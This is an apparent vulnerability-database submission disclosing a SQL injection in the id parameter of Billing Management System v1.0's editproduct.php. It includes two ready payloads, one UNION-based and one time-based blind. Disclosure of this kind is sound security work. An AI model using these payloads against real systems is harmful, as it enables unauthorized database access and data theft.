| Title | Billing Management System v1.0 /smartbilling_source_code/editproduct.php GET parameter id exists SQL injection vulnerability |
|---|
| Description | An issue was discovered in Billing Management System v1.0.
There is a SQL injection that can directly issue instructions to the background database system via /smartbilling_source_code/editproduct.php?id.
Payload1: id=-1 union all select null,null,null,null,concat(0x565758,0x686970),null,null,null,null-- -
Payload2:id=2 and (select 2 from (select(sleep(15)))i) |
|---|
| Source | ⚠️ https://github.com/niyuchunqiu/cve/blob/main/SQL.md |
|---|
| User | lixu (UID 46762) |
|---|
| Submission | 05/14/2023 05:06 (3 years ago) |
|---|
| Moderation | 05/14/2023 09:36 (5 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 228970 [SourceCodester Billing Management System 1.0 GET Parameter editproduct.php ID sql injection] |
|---|
| Points | 19 |
|---|